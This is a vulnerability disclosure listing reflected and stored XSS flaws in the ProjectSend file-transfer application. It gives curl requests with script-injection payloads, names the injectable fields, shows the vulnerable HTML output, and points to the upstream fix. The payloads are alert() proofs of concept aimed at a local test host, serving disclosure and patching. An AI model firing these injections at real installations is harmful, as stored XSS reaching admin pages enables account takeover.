XSS vulnerabilities in Projectsend

Being made aware about some vulnerabilities in ProjectSend I also had a look at the application and discovered multiple XSS issues. Here is a list of issues found:

Description

ProjectSend is a self-hosted PHP based file-transfer platform. Several serious vulnerabilities have been discovered so far (e.g. on ExploitDB). Here are some further XSS vulnerabilities by which ProjectSend is affected.

1. Non-Persistent XSS

1.1 my_files/index.php

As client in searchbox on my_files/index.php:

curl 'http://projectsend.local.de/my_files/' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/my_files/' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E'

1.2 Searchboxes

As admin in searchboxes on “Manage Clients”, “Clients groups” and “System Users”:

curl 'http://projectsend.local.de/clients.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/clients.php' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'

Output:

<input type="text" name="search" id="search" value=""><script>alert('XSS')</script>" class="txtfield form_actions_search_box" />

The searchboxes on “Clients groups”, “System Users” and the “Recent activities log” are injectible in the same way.

2. Persistent XSS

1.1 - My Account:

As client in “MyAccount” field “Name”. No special vector required.

HTML output for input "><script>alert(1);</script>:

<input type="text" name="add_client_form_name" id="add_client_form_name" class="required" value=""><script>alert(1);</script>" placeholder="Will be visible on the client's file list" />

This XSS also affects admins when they open the Clients->Manage clients page:

clients.php html output:

<td><input type="checkbox" name="selected_clients[]" value="2" /></td>
<td>"><script>alert(1);</script></td>
<td>Client1</td>

The fields “Adress” and “Telephone” are injectible in the same way.

1.2 File upload fields:

As client in “File upload” field “Name”.

A simple vector suffices: "<script>alert('XSS')</script>

The XSS is activated when admins open the dashboard (the code gets loaded from /actions-log.php via ajax) or when they access the “Recent activities log”

actions-log.php html output:

<td class="footable-visible">"<script>alert('XSS')</script></td>

1.3 Add groups fields.

As admin in Groups -> Add new.

The field name and description are injectible. The XSS is activated on the “Manage groups” page.

Simple vector: "><script>alert('XSS')</script>

Solution

I developed a fix for these and other vulnerabilities, also other people contributed many security fixes to ProjectSend which have been accepted into the master branch. So the solution is to update to current version from Github. See https://github.com/ignacionelson/ProjectSend/issues/80 for discussion.

Disclosure

This information also appeared on Bugtraq.